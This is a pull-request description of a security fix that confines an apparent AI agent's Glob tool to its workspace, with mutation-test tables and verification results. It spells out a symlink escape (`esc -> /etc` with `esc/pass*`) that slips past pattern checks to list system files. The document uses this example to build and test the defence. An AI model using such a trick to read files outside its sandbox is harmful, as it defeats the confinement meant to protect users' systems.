**2. Result confinement — `confineGlobMatches()` on the host.** Realpath-checks every expanded match against the workspace, reusing `validateRawPathWithinCwd` (the same open(2)-faithful walk `Read`/`Write`/`Edit` use, `..`-after-symlink safe per #6923). This closes the one escape **no pattern inspection can see**: a symlinked *directory* inside the workspace. With `esc -> /etc` present, `esc/pass*` contains no `~`, no leading `/` and no `..` — every character is legal — and it lists `/etc`. Withheld matches are reported (`[N matches outside the workspace withheld]`), not dropped silently.

It validates each match's **parent directory** rather than the match itself, for cost (matches cluster into few directories, so a per-directory cache bounds this to one walk per unique directory, not one per file) and for correctness (a symlinked *file* whose name lives in the workspace is a legitimate workspace entry; listing its name leaks nothing, and following it is `Read`'s decision, which validates independently). Fail-closed: an unresolvable parent is withheld.

## Not done, deliberately

The issue offered "add `pattern` to `PROTECTED_PATH_INPUT_FIELDS`" as an alternative. Rejected: `Grep`'s `pattern` is a **regex**, not a path, and the floor's field list is shared across tools — adding it would misread regexes as paths and produce false denials. Containment belongs at the tool, where the workspace root is known.

## No functional regression

`*~` (emacs backups), `report..final.md`, `v1..v2/*.diff`, `src/**/*.{js,ts}` and `./src/*.ts` are all legitimate and still match — pinned by explicit positive controls, not left to chance.

## Proved red before green

Per `docs/false-safety-guards.md`, with `cp` backups (never `git checkout --`), asserting each mutation actually landed before running:

| mutation | expected red | observed |
|---|---|---|
| A — unwire the syntactic guard from the host caller (#7262 shape) | the 3 syntactic tests | exactly those 3 (`~`, absolute, `..`) |
| B — replace `confineGlobMatches` with a pass-through | the 2 symlink tests | exactly those 2 |
| C — unwire the container guard | the container escape test | that 1 |
| D — validator returns a reason unconditionally (#7273 shape: deny-everything satisfies its own negative tests) | the positive controls | 23 failures |

Mutation D is the one that matters most: without the positive controls, every other test in this PR would pass just as well against a `Glob` that refused all input.

## Verification

- `tests/built-in-tools/tool-transforms.test.js`, `tests/byok-tool-executor.test.js`, `tests/docker-byok-session.test.js` — **294/294 green**
- Adjacent suites touching `Glob` (`byok-session`, `byok-tools`, `permission-manager`, `permission-hook-floor`, `permission-secret-read-floor`, `built-in-tools/*`) — **all green**
- All 9 `packages/server/scripts/lint-*.sh` — **PASS**
- eslint — clean